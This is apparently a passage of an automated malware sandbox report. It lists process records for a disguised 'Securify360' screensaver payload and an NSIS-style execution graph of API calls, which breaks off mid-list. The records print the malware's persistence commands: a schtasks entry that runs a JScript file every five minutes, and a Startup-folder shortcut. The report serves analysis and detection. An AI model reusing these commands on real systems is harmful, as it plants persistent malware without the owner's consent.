                                                                                            Commandline:choice /d y /t 5
                                                                                            Imagebase:0x300000
                                                                                            File size:28'160 bytes
                                                                                            MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:13
                                                                                            Start time:11:39:00
                                                                                            Start date:12/12/2024
                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:cmd /c schtasks.exe /create /tn "Mon" /tr "wscript //B 'C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.js'" /sc minute /mo 5 /F
                                                                                            Imagebase:0xd70000
                                                                                            File size:236'544 bytes
                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:14
                                                                                            Start time:11:39:00
                                                                                            Start date:12/12/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff620390000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:15
                                                                                            Start time:11:39:00
                                                                                            Start date:12/12/2024
                                                                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:schtasks.exe /create /tn "Mon" /tr "wscript //B 'C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.js'" /sc minute /mo 5 /F
                                                                                            Imagebase:0x50000
                                                                                            File size:187'904 bytes
                                                                                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:16
                                                                                            Start time:11:39:00
                                                                                            Start date:12/12/2024
                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Securify360.url" & echo URL="C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Securify360.url" & exit
                                                                                            Imagebase:0xd70000
                                                                                            File size:236'544 bytes
                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:17
                                                                                            Start time:11:39:00
                                                                                            Start date:12/12/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff620390000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:18
                                                                                            Start time:11:39:02
                                                                                            Start date:12/12/2024
                                                                                            Path:C:\Windows\System32\wscript.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.js"
                                                                                            Imagebase:0x7ff6df8d0000
                                                                                            File size:170'496 bytes
                                                                                            MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:19
                                                                                            Start time:11:39:02
                                                                                            Start date:12/12/2024
                                                                                            Path:C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scr
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scr" "C:\Users\user\AppData\Local\Secure360 Innovations\V"
                                                                                            Imagebase:0xf90000
                                                                                            File size:893'608 bytes
                                                                                            MD5 hash:6EE7DDEBFF0A2B78C7AC30F6E00D1D11
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Antivirus matches:
                                                                                            • Detection: 3%, ReversingLabs
                                                                                            Has exited:true

                                                                                            Target ID:21
                                                                                            Start time:11:39:11
                                                                                            Start date:12/12/2024
                                                                                            Path:C:\Windows\System32\wscript.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.js"
                                                                                            Imagebase:0x7ff6df8d0000
                                                                                            File size:170'496 bytes
                                                                                            MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:22
                                                                                            Start time:11:39:11
                                                                                            Start date:12/12/2024
                                                                                            Path:C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scr
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scr" "C:\Users\user\AppData\Local\Secure360 Innovations\V"
                                                                                            Imagebase:0xf90000
                                                                                            File size:893'608 bytes
                                                                                            MD5 hash:6EE7DDEBFF0A2B78C7AC30F6E00D1D11
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Reset < >

                                                                                              Execution Graph

                                                                                              Execution Coverage:17.6%
                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                              Signature Coverage:21.4%
                                                                                              Total number of Nodes:1453
                                                                                              Total number of Limit Nodes:25
                                                                                              execution_graph 4173 402fc0 4174 401446 18 API calls 4173->4174 4175 402fc7 4174->4175 4176 403017 4175->4176 4177 40300a 4175->4177 4180 401a13 4175->4180 4178 406831 18 API calls 4176->4178 4179 401446 18 API calls 4177->4179 4178->4180 4179->4180 4181 4023c1 4182 40145c 18 API calls 4181->4182 4183 4023c8 4182->4183 4186 407296 4183->4186 4189 406efe CreateFileW 4186->4189 4190 406f30 4189->4190 4191 406f4a ReadFile 4189->4191 4192 4062cf 11 API calls 4190->4192 4193 4023d6 4191->4193 4196 406fb0 4191->4196 4192->4193 4194 406fc7 ReadFile lstrcpynA lstrcmpA 4194->4196 4197 40700e SetFilePointer ReadFile 4194->4197 4195 40720f CloseHandle 4195->4193 4196->4193 4196->4194 4196->4195 4198 407009 4196->4198 4197->4195 4199 4070d4 ReadFile 4197->4199 4198->4195 4200 407164 4199->4200 4200->4198 4200->4199 4201 40718b SetFilePointer GlobalAlloc ReadFile 4200->4201 4202 4071eb lstrcpynW GlobalFree 4201->4202 4203 4071cf 4201->4203 4202->4195 4203->4202 4203->4203 4204 401cc3 4205 40145c 18 API calls 4204->4205 4206 401cca lstrlenW 4205->4206 4207 4030dc 4206->4207 4209 4030e3 4207->4209 4210 405f7d wsprintfW 4207->4210 4210->4209 4211 4028c5 4212 40290e 4211->4212 4213 402918 4212->4213 4214 40292a 4212->4214 4215 4062cf 11 API calls 4213->4215 4216 4062cf 11 API calls 4214->4216 4233 402922 4215->4233 4219 402934 4216->4219 4217 4029ae RegSetValueExW 4220 4029c6 RegCloseKey 4217->4220 4221 4029cb 4217->4221 4218 402963 4218->4217 4226 40337f 33 API calls 4218->4226 4219->4218 4223 401446 18 API calls 4219->4223 4228 4030e3 4220->4228 4222 4062cf 11 API calls 4221->4222 4222->4220 4224 402947 4223->4224 4227 4062cf 11 API calls 4224->4227 4229 40297b 4226->4229 4227->4218 4234 406250 4229->4234 4232 4062cf 11 API calls 4232->4233 4233->4217 4235 406273 4234->4235 4236 4062b6 4235->4236 4237 406288 wsprintfW 4235->4237 4238 402991 4236->4238 4239 4062bf lstrcatW 4236->4239 4237->4236 4237->4237 4238->4232 4239->4238 4240 401c46 4241 40145c 18 API calls 4240->4241 4242 401c4c 4241->4242 4243 4062cf 11 API calls 4242->4243 4244 401c59 4243->4244 4245 406cc7 81 API calls 4244->4245 4246 401c64 4245->4246 4247 4030c7 InvalidateRect 4248 4030e3 4247->4248 4249 403049 4250 401446 18 API calls 4249->4250 4251 403050 4250->4251 4252 406831 18 API calls 4251->4252 4253 401a13 4251->4253 4252->4253 4254 40204a 4255 401446 18 API calls 4254->4255 4256 402051 IsWindow 4255->4256 4257 4018d3 4256->4257 4258 40324c 4259 403277 4258->4259 4260 40325e SetTimer 4258->4260 4261 4032cc 4259->4261 4262 403291 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4259->4262 4260->4259 4262->4261 4263 4022cc 4264 40145c 18 API calls 4263->4264 4265 4022d3 4264->4265 4266 406301 2 API calls 4265->4266 4267 4022d9 4266->4267 4269 4022e8 4267->4269 4272 405f7d wsprintfW 4267->4272 4270 4030e3 4269->4270 4273 405f7d wsprintfW 4269->4273 4272->4269 4273->4270 4274 4030cf 4275 40145c 18 API calls 4274->4275 4276 4030d6 4275->4276 4277 4030dc 4276->4277 4281 4063d8 GlobalAlloc lstrlenW 4276->4281 4280 4030e3 4277->4280 4308 405f7d wsprintfW 4277->4308 4288 406460 4281->4288 4290 40640e 4281->4290 4282 40643b GetVersionExW 4283 40646a 4282->4283 4282->4288 4284 406490 LoadLibraryA 4283->4284 4285 406479 4283->4285 4284->4288 4289 4064ae GetProcAddress GetProcAddress GetProcAddress 4284->4289 4287 4065b1 GlobalFree 4285->4287 4285->4288 4291 4065c7 LoadLibraryA 4287->4291 4292 406709 FreeLibrary 4287->4292 4288->4277 4295 4064d6 4289->4295 4298 406621 4289->4298 4290->4282 4309 406057 CharUpperW 4290->4309 4291->4288 4294 4065e1 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4291->4294 4292->4288 4293 40667d FreeLibrary 4302 406656 4293->4302 4294->4298 4296 4064fa FreeLibrary GlobalFree 4295->4296 4295->4298 4303 406516 4295->4303 4296->4288 4297 406716 4301 40671b CloseHandle FreeLibrary 4297->4301 4298->4293 4298->4302 4299 406528 lstrcpyW OpenProcess 4300 40657b CloseHandle CharUpperW lstrcmpW 4299->4300 4299->4303 4300->4298 4300->4303 4304 406730 CloseHandle 4301->4304 4302->4297 4305 4066b1 lstrcmpW 4302->4305 4306 4066e2 CloseHandle 4302->4306 4307 406700 CloseHandle 4302->4307 4303->4287 4303->4299 4303->4300 4304->4301 4305->4302 4305->4304 4306->4302 4307->4292 4308->4280 4309->4290 4310 4044d1 4311 40450b 4310->4311 4312 40453e 4310->4312 4378 405cb0 GetDlgItemTextW 4311->4378 4314 40454b GetDlgItem GetAsyncKeyState 4312->4314 4317 4045dd 4312->4317 4318 40456a GetDlgItem 4314->4318 4324 404588 4314->4324 4315 404516 4319 406064 5 API calls 4315->4319 4316 4046c9 4376 40485f 4316->4376 4380 405cb0 GetDlgItemTextW 4316->4380 4317->4316 4327 406831 18 API calls 4317->4327 4317->4376 4320 403d6b 19 API calls 4318->4320 4322 40451c 4319->4322 4321 40457d ShowWindow 4320->4321 4321->4324 4326 403ea0 5 API calls 4322->4326 4329 4045a5 SetWindowTextW 4324->4329 4334 405d85 4 API calls 4324->4334 4325 403df6 8 API calls 4330 404873 4325->4330 4331 404521 GetDlgItem 4326->4331 4332 40465b SHBrowseForFolderW 4327->4332 4328 4046f5 4333 4067aa 18 API calls 4328->4333 4335 403d6b 19 API calls 4329->4335 4336 40452f IsDlgButtonChecked 4331->4336 4331->4376 4332->4316 4337 404673 CoTaskMemFree 4332->4337 4340 4046fb 4333->4340 4342 40459b 4334->4342 4338 4045c3 4335->4338 4336->4312 4339 40674e 3 API calls 4337->4339 4343 403d6b 19 API calls 4338->4343 4344 404680 4339->4344 4381 406035 lstrcpynW 4340->4381 4342->4329 4347 40674e 3 API calls 4342->4347 4348 4045ce 4343->4348 4345 4046b7 SetDlgItemTextW 4344->4345 4352 406831 18 API calls 4344->4352 4345->4316 4346 404712 4349 406328 3 API calls 4346->4349 4347->4329 4379 403dc4 SendMessageW 4348->4379 4360 40471a 4349->4360 4351 4045d6 4353 406328 3 API calls 4351->4353 4354 40469f lstrcmpiW 4352->4354 4353->4317 4354->4345 4356 4046b0 lstrcatW 4354->4356 4355 40475c 4382 406035 lstrcpynW 4355->4382 4356->4345 4358 404765 4359 405d85 4 API calls 4358->4359 4361 40476b GetDiskFreeSpaceW 4359->4361 4360->4355 4364 40677d 2 API calls 4360->4364 4365 4047b1 4360->4365 4363 40478f MulDiv 4361->4363 4361->4365 4363->4365 4364->4360 4366 40480e 4365->4366 4383 4043d9 4365->4383 4368 404831 4366->4368 4370 40141d 80 API calls 4366->4370 4391 403db1 KiUserCallbackDispatcher 4368->4391 4369 4047ff 4371 404810 SetDlgItemTextW 4369->4371 4372 404804 4369->4372 4370->4368 4371->4366 4374 4043d9 21 API calls 4372->4374 4374->4366 4375 40484d 4375->4376 4392 403d8d 4375->4392 4376->4325 4378->4315 4379->4351 4380->4328 4381->4346 4382->4358 4384 4043f9 4383->4384 4385 406831 18 API calls 4384->4385 4386 404439 4385->4386 4387 406831 18 API calls 4386->4387 4388 404444 4387->4388 4389 406831 18 API calls 4388->4389 4390 404454 lstrlenW wsprintfW SetDlgItemTextW 4389->4390 4390->4369 4391->4375 4393 403da0 SendMessageW 4392->4393 4394 403d9b 4392->4394 4393->4376 4394->4393 4395 401dd3 4396 401446 18 API calls 4395->4396 4397 401dda 4396->4397 4398 401446 18 API calls 4397->4398 4399 4018d3 4398->4399 4426 401cd5 4427 401446 18 API calls 4426->4427 4428 401cdd 4427->4428 4429 401446 18 API calls 4428->4429 4430 401ce8 4429->4430 4431 40145c 18 API calls 4430->4431 4432 401cf1 4431->4432 4433 401d07 lstrlenW 4432->4433 4434 401d43 4432->4434 4435 401d11 4433->4435 4435->4434 4439 406035 lstrcpynW 4435->4439 4437 401d2c 4437->4434 4438 401d39 lstrlenW 4437->4438 4438->4434 4439->4437 4440 402cd7 4441 401446 18 API calls 4440->4441 4444 402c64 4441->4444 4442 402d99 4443 402d17 ReadFile 4443->4444 4444->4440 4444->4442 4444->4443 4445 402dd8 4446 4030e3 4445->4446 4447 402ddf 4445->4447 4448 402de5 FindClose 4447->4448 4448->4446 4449 401d5c 4450 40145c 18 API calls 4449->4450 4451 401d63 4450->4451 4452 40145c 18 API calls 4451->4452 4453 401d6c 4452->4453 4454 401d73 lstrcmpiW 4453->4454 4455 401d86 lstrcmpW 4453->4455 4456 401d79 4454->4456 4455->4456 4457 401c99 4455->4457 4456->4455 4456->4457 4458 4027e3 4459 4027e9 4458->4459 4460 4027f2 4459->4460 4461 402836 4459->4461 4474 401553 4460->4474 4463 40145c 18 API calls 4461->4463 4465 40283d 4463->4465 4464 4027f9 4467 40145c 18 API calls 4464->4467 4470 401a13 4464->4470 4466 4062cf 11 API calls 4465->4466 4468 40284d 4466->4468 4469 40280a RegDeleteValueW 4467->4469 4478 40149d RegOpenKeyExW 4468->4478 4471 4062cf 11 API calls 4469->4471 4473 40282a RegCloseKey 4471->4473 4473->4470 4475 401563 4474->4475 4476 40145c 18 API calls 4475->4476 4477 401589 RegOpenKeyExW 4476->4477 4477->4464 4483 4014c9 4478->4483 4487 401515 4478->4487 4479 4014ef RegEnumKeyW 4480 401501 RegCloseKey 4479->4480 4479->4483 4481 406328 3 API calls 4480->4481 4484 401511 4481->4484 4482 401526 RegCloseKey 4482->4487 4483->4479 4483->4480 4483->4482 4485 40149d 3 API calls 4483->4485 4486 401541 RegDeleteKeyW 4484->4486 4484->4487 4485->4483 4486->4487 4487->4470 4488 402ae4 4489 4030e3 4488->4489 4490 402aeb 4488->4490 4491 402af2 CloseHandle 4490->4491 4491->4489 4492 402065 4493 401446 18 API calls 4492->4493 4494 40206d 4493->4494 4495 401446 18 API calls 4494->4495 4496 402076 GetDlgItem 4495->4496 4497 4030dc 4496->4497 4499 4030e3 4497->4499 4500 405f7d wsprintfW 4497->4500 4500->4499 4501 402665 4502 40145c 18 API calls 4501->4502 4503 40266b 4502->4503 4504 40145c 18 API calls 4503->4504 4505 402674 4504->4505 4506 40145c 18 API calls 4505->4506 4507 40267d 4506->4507 4508 4062cf 11 API calls 4507->4508 4509 40268c 4508->4509 4510 406301 2 API calls 4509->4510 4516 402695 4510->4516 4511 4026a6 lstrlenW lstrlenW 4513 404f9e 25 API calls 4511->4513 4512 404f9e 25 API calls 4512->4516 4514 4026e8 SHFileOperationW 4513->4514 4515 4030e3 4514->4515 4514->4516 4516->4511 4516->4512 4516->4515 4517 401c69 4518 40145c 18 API calls 4517->4518 4519 401c70 4518->4519 4520 4062cf 11 API calls 4519->4520 4521 401c80 4520->4521 4522 405ccc MessageBoxIndirectW 4521->4522 4523 401a13 4522->4523 4524 402f6e 4525 402f72 4524->4525 4526 402fae 4524->4526 4528 4062cf 11 API calls 4525->4528 4527 40145c 18 API calls 4526->4527 4536 402f9d 4527->4536 4529 402f7d 4528->4529 4530 4062cf 11 API calls 4529->4530 4531 402f90 4530->4531 4532 402fa2 4531->4532 4533 402f98 4531->4533 4535 406113 9 API calls 4532->4535 4534 403ea0 5 API calls 4533->4534 4534->4536 4535->4536 4537 4023f0 4538 402403 4537->4538 4539 4024da 4537->4539 4540 40145c 18 API calls 4538->4540 4541 404f9e 25 API calls 4539->4541 4542 40240a 4540->4542 4547 4024f1 4541->4547 4543 40145c 18 API calls 4542->4543 4544 402413 4543->4544 4545 402429 LoadLibraryExW 4544->4545 4546 40241b GetModuleHandleW 4544->4546 4548 40243e 4545->4548 4549 4024ce 4545->4549 4546->4545 4546->4548 4561 406391 GlobalAlloc WideCharToMultiByte 4548->4561 4551 404f9e 25 API calls 4549->4551 4551->4539 4552 402449 4553 40248c 4552->4553 4554 40244f 4552->4554 4555 404f9e 25 API calls 4553->4555 4559 40245f 4554->4559 4564 401435 4554->4564 4556 402496 4555->4556 4558 4062cf 11 API calls 4556->4558 4558->4559 4559->4547 4560 4024c0 FreeLibrary 4559->4560 4560->4547 4562 4063c9 GlobalFree 4561->4562 4563 4063bc GetProcAddress 4561->4563 4562->4552 4563->4562 4565 404f9e 25 API calls 4564->4565 4566 401443 4565->4566 4566->4559 3415 402175 3425 401446 3415->3425 3417 40217c 3418 401446 18 API calls 3417->3418 3419 402186 3418->3419 3420 4062cf 11 API calls 3419->3420 3423 402197 3419->3423 3420->3423 3421 4021aa EnableWindow 3424 4030e3 3421->3424 3422 40219f ShowWindow 3422->3424 3423->3421 3423->3422 3426 406831 18 API calls 3425->3426 3427 401455 3426->3427 3427->3417 4567 4048f8 4568 404906 4567->4568 4569 40491d 4567->4569 4570 404986 4568->4570 4571 40490c 4568->4571 4572 40492b IsWindowVisible 4569->4572 4578 404942 4569->4578 4574 40498c CallWindowProcW 4570->4574 4573 403ddb SendMessageW 4571->4573 4572->4570 4575 404938 4572->4575 4576 404916 4573->4576 4574->4576 4586 40487a SendMessageW 4575->4586 4578->4574 4591 406035 lstrcpynW 4578->4591 4580 404971 4592 405f7d wsprintfW 4580->4592 4582 404978 4583 40141d 80 API calls 4582->4583 4584 40497f 4583->4584 4593 406035 lstrcpynW 4584->4593 4587 4048d7 SendMessageW 4586->4587 4588 40489d GetMessagePos ScreenToClient SendMessageW 4586->4588 4590 4048cf 4587->4590 4589 4048d4 4588->4589 4588->4590 4589->4587 4590->4578 4591->4580 4592->4582 4593->4570 3720 4050f9 3721 4052c1 3720->3721 3722 40511a GetDlgItem GetDlgItem GetDlgItem 3720->3722 3724 4052ca GetDlgItem CreateThread CloseHandle 3721->3724 3725 4052f2 3721->3725 3769 403dc4 SendMessageW 3722->3769 3724->3725 3772 405073 OleInitialize 3724->3772 3727 405342 3725->3727 3728 40530c ShowWindow ShowWindow 3725->3728 3729 405320 3725->3729 3726 40518e 3737 406831 18 API calls 3726->3737 3731 403df6 8 API calls 3727->3731 3771 403dc4 SendMessageW 3728->3771 3730 40537e 3729->3730 3733 405331 3729->3733 3734 405357 ShowWindow 3729->3734 3730->3727 3740 405389 SendMessageW 3730->3740 3736 4052ba 3731->3736 3735 403d44 SendMessageW 3733->3735 3738 405377 3734->3738 3739 405369 3734->3739 3735->3727 3741 4051ad 3737->3741 3743 403d44 SendMessageW 3738->3743 3742 404f9e 25 API calls 3739->3742 3740->3736 3744 4053a2 CreatePopupMenu 3740->3744 3745 4062cf 11 API calls 3741->3745 3742->3738 3743->3730 3746 406831 18 API calls 3744->3746 3747 4051b8 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3745->3747 3748 4053b2 AppendMenuW 3746->3748 3749 405203 SendMessageW SendMessageW 3747->3749 3750 40521f 3747->3750 3751 4053c5 GetWindowRect 3748->3751 3752 4053d8 3748->3752 3749->3750 3754 405232 3750->3754 3755 405224 SendMessageW 3750->3755 3753 4053df TrackPopupMenu 3751->3753 3752->3753 3753->3736 3756 4053fd 3753->3756 3757 403d6b 19 API calls 3754->3757 3755->3754 3758 405419 SendMessageW 3756->3758 3759 405242 3757->3759 3758->3758 3760 405436 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3758->3760 3761 40524b ShowWindow 3759->3761 3762 40527f GetDlgItem SendMessageW 3759->3762 3765 40545b SendMessageW 3760->3765 3763 405261 ShowWindow 3761->3763 3764 40526e 3761->3764 3762->3736 3766 4052a2 SendMessageW SendMessageW 3762->3766 3763->3764 3770 403dc4 SendMessageW 3764->3770 3765->3765 3767 405486 GlobalUnlock SetClipboardData CloseClipboard 3765->3767 3766->3736 3767->3736 3769->3726 3770->3762 3771->3729 3773 403ddb SendMessageW 3772->3773 3774 405096 3773->3774 3777 4062cf 11 API calls 3774->3777 3778 40139d 80 API calls 3774->3778 3779 4050c1 3774->3779 3775 403ddb SendMessageW 3776 4050d1 OleUninitialize 3775->3776 3777->3774 3778->3774 3779->3775 4594 4020f9 GetDC GetDeviceCaps 4595 401446 18 API calls 4594->4595 4596 402116 MulDiv 4595->4596 4597 401446 18 API calls 4596->4597 4598 40212c 4597->4598 4599 406831 18 API calls 4598->4599 4600 402165 CreateFontIndirectW 4599->4600 4601 4030dc 4600->4601 4602 4030e3 4601->4602 4604 405f7d wsprintfW 4601->4604 4604->4602 4605 4024fb 4606 40145c 18 API calls 4605->4606 4607 402502 4606->4607 4608 40145c 18 API calls 4607->4608 4609 40250c 4608->4609 4610 40145c 18 API calls 4609->4610 4611 402515 4610->4611 4612 40145c 18 API calls 4611->4612 4613 40251f 4612->4613 4614 40145c 18 API calls 4613->4614 4615 402529 4614->4615 4616 40253d 4615->4616 4617 40145c 18 API calls 4615->4617 4618 4062cf 11 API calls 4616->4618 4617->4616 4619 40256a CoCreateInstance 4618->4619 4620 40258c 4619->4620 4621 4026fc 4622 401ee4 4621->4622 4624 402708 4621->4624 4622->4621 4623 406831 18 API calls 4622->4623 4623->4622 3780 4019fd 3781 40145c 18 API calls 3780->3781 3782 401a04 3781->3782 3785 405eab 3782->3785 3786 405eb8 GetTickCount GetTempFileNameW 3785->3786 3787 401a0b 3786->3787 3788 405eee 3786->3788 3788->3786 3788->3787 4625 4022fd 4626 40145c 18 API calls 4625->4626 4627 402304 GetFileVersionInfoSizeW 4626->4627 4628 4030e3 4627->4628 4629 40232b GlobalAlloc 4627->4629 4629->4628 4630 40233f GetFileVersionInfoW 4629->4630 4631 402350 VerQueryValueW 4630->4631 4637 402381 GlobalFree 4630->4637 4633 402369 4631->4633 4631->4637 4638 405f7d wsprintfW 4633->4638 4635 402375 4639 405f7d wsprintfW 4635->4639 4637->4628 4638->4635 4639->4637 4640 402afd 4641 40145c 18 API calls 4640->4641 4642 402b04 4641->4642 4647 405e7c GetFileAttributesW CreateFileW 4642->4647 4644 402b10 4646 4030e3 4644->4646 4648 405f7d wsprintfW 4644->4648 4647->4644 4648->4646 4649 4029ff 4650 401553 19 API calls 4649->4650 4651 402a09 4650->4651 4652 40145c 18 API calls 4651->4652 4653 402a12 4652->4653 4654 402a1f RegQueryValueExW 4653->4654 4658 401a13 4653->4658 4655 402a45 4654->4655 4656 402a3f 4654->4656 4655->4658 4659 4029e4 RegCloseKey 4655->4659 4656->4655 4660 405f7d wsprintfW 4656->4660 4659->4658 4660->4655 4661 4040ff 4662 404109 4661->4662 4663 40413a 4662->4663 4676 403ff6 WideCharToMultiByte 4662->4676 4665 403d6b 19 API calls 4663->4665 4666 40417a 4665->4666 4667 403d6b 19 API calls 4666->4667 4668 404187 CheckDlgButton 4667->4668 4679 403db1 KiUserCallbackDispatcher 4668->4679 4670 4041a5 GetDlgItem 4680 403dc4 SendMessageW 4670->4680 4672 4041bb SendMessageW 4673 4041e1 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4672->4673 4674 4041d8 GetSysColor 4672->4674 4675 404388 4673->4675 4674->4673 4677 404033 4676->4677 4678 404015 GlobalAlloc WideCharToMultiByte 4676->4678 4677->4663 4678->4677 4679->4670 4680->4672 4681 401000 4682 401037 BeginPaint GetClientRect 4681->4682 4683 40100c DefWindowProcW 4681->4683 4685 4010fc 4682->4685 4686 401182 4683->4686 4687 401073 CreateBrushIndirect FillRect DeleteObject 4685->4687 4688 401105 4685->4688 4687->4685 4689 401170 EndPaint 4688->4689 4690 40110b CreateFontIndirectW 4688->4690 4689->4686 4690->4689 4691 40111b 6 API calls 4690->4691 4691->4689 4692 401f80 4693 401446 18 API calls 4692->4693 4694 401f88 4693->4694 4695 401446 18 API calls 4694->4695 4696 401f93 4695->4696 4697 401fa3 4696->4697 4699 40145c 18 API calls 4696->4699 4698 401fb3 4697->4698 4700 40145c 18 API calls 4697->4700 4701 402006 4698->4701 4702 401fbc 4698->4702 4699->4697 4700->4698 4704 40145c 18 API calls 4701->4704 4703 401446 18 API calls 4702->4703 4705 401fc4 4703->4705 4706 40200d 4704->4706 4707 401446 18 API calls 4705->4707 4708 40145c 18 API calls 4706->4708 4710 401fce 4707->4710 4709 402016 FindWindowExW 4708->4709 4713 402036 4709->4713 4711 401ff6 SendMessageW 4710->4711 4712 401fd8 SendMessageTimeoutW 4710->4712 4711->4713 4712->4713 4714 4030e3 4713->4714 4716 405f7d wsprintfW 4713->4716 4716->4714 4717 403d02 4718 403d0d 4717->4718 4719 403d11 4718->4719 4720 403d14 GlobalAlloc 4718->4720 4720->4719 4721 402082 4722 401446 18 API calls 4721->4722 4723 402093 SetWindowLongW 4722->4723 4724 4030e3 4723->4724 4725 402a84 4726 401553 19 API calls 4725->4726 4727 402a8e 4726->4727 4728 401446 18 API calls 4727->4728 4729 402a98 4728->4729 4730 402ab2 RegEnumKeyW 4729->4730 4731 402abe RegEnumValueW 4729->4731 4733 401a13 4729->4733 4732 402a7e 4730->4732 4731->4732 4731->4733 4732->4733 4734 4029e4 RegCloseKey 4732->4734 4734->4733 4735 40288a 4736 4028d4 RegCreateKeyExW 4735->4736 4738 4028e8 4736->4738 4743 4029ef 4736->4743 4739 402934 4738->4739 4740 40145c 18 API calls 4738->4740 4742 401446 18 API calls 4739->4742 4758 402963 4739->4758 4741 4028fc lstrlenW 4740->4741 4745 402918 4741->4745 4746 40292a 4741->4746 4748 402947 4742->4748 4744 4029ae RegSetValueExW 4747 4029cb 4744->4747 4756 4029c6 RegCloseKey 4744->4756 4750 4062cf 11 API calls 4745->4750 4754 4062cf 11 API calls 4746->4754 4751 4062cf 11 API calls 4747->4751 4752 4062cf 11 API calls 4748->4752 4749 40337f 33 API calls 4753 40297b 4749->4753 4755 402922 4750->4755 4751->4756 4752->4758 4759 406250 2 API calls 4753->4759 4754->4739 4755->4744 4756->4743 4758->4744 4758->4749 4760 402991 4759->4760 4761 4062cf 11 API calls 4760->4761 4761->4755 4762 402c8a 4763 402ca2 4762->4763 4764 402c8f 4762->4764 4766 40145c 18 API calls 4763->4766 4765 401446 18 API calls 4764->4765 4768 402c97 4765->4768 4767 402ca9 lstrlenW 4766->4767 4767->4768 4769 402ccb WriteFile 4768->4769 4770 401a13 4768->4770 4769->4770 4771 401d8e 4772 40145c 18 API calls 4771->4772 4773 401d95 ExpandEnvironmentStringsW 4772->4773 4774 401da8 4773->4774 4776 401db9 4773->4776 4775 401dad lstrcmpW 4774->4775 4774->4776 4775->4776 4777 401e0f 4778 401446 18 API calls 4777->4778 4779 401e17 4778->4779 4780 401446 18 API calls 4779->4780 4781 401e21 4780->4781 4782 4030e3 4781->4782 4784 405f7d wsprintfW 4781->4784 4784->4782 4785 40438f 4786 4043c8 4785->4786 4787 40439f 4785->4787 4789 403df6 8 API calls 4786->4789 4788 403d6b 19 API calls 4787->4788 4791 4043ac SetDlgItemTextW 4788->4791 4790 4043d4 4789->4790 4791->4786 4792 403f90 4793 403fa0 4792->4793 4794 403fbc 4792->4794 4803 405cb0 GetDlgItemTextW 4793->4803 4796 403fc2 SHGetPathFromIDListW 4794->4796 4797 403fef 4794->4797 4799 403fd9 SendMessageW 4796->4799 4800 403fd2 4796->4800 4798 403fad SendMessageW 4798->4794 4799->4797 4801 40141d 80 API calls 4800->4801 4801->4799 4803->4798 4804 402392 4805 40145c 18 API calls 4804->4805 4806 402399 4805->4806 4809 407224 4806->4809 4810 406efe 25 API calls 4809->4810 4811 407244 4810->4811 4812 4023a7 4811->4812 4813 